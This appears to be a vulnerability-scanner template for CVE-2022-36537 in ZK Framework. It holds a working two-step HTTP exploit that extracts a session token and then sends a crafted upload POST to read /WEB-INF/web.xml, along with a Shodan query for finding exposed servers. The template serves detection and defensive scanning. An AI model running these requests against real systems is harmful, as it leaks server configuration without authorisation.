id: CVE-2022-36537

info:
  name: ZK Framework - Information Disclosure
  author: theamanrawat
  severity: high
  description: |
    ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
  remediation: |
    Apply the latest security patches or updates provided by the ZK Framework to fix the information disclosure vulnerability.
  reference:
    - https://github.com/Malwareman007/CVE-2022-36537/
    - https://tracker.zkoss.org/browse/ZK-5150
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36537
    - https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-exploiting-zk-java-framework-rce-flaw/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-36537
    cwe-id: CWE-200
    epss-score: 0.93041
    epss-percentile: 0.98764
    cpe: cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: zkoss
    product: zk_framework
    shodan-query: http.title:"Server backup manager"
  tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive

http:
  - raw:
      - |
        GET /login.zul HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp
        Content-Length: 154

        ------WebKitFormBoundaryCs6yB0zvpfSBbYEp
        Content-Disposition: form-data; name="nextURI"

        /WEB-INF/web.xml
        ------WebKitFormBoundaryCs6yB0zvpfSBbYEp--

    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - <display-name>.*</display-name>
          - |-
            <welcome-file-list>((.|
            )*)welcome-file-list>
          - xml version
          - web-app
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: dtid
        group: 1
        regex:
          - "dt:'(.*?)',cu:"
        internal: true

# digest: 4b0a00483046022100bb093098111ac418e84aae890843b0e1781c6df3b949ca328662e5fbe5b68bee022100b5c251cc43da306b8419a8c8f8b287d44d1456124a9bc2e1c385511898e71cdc:922c64590222798bb761d5b6d8e72950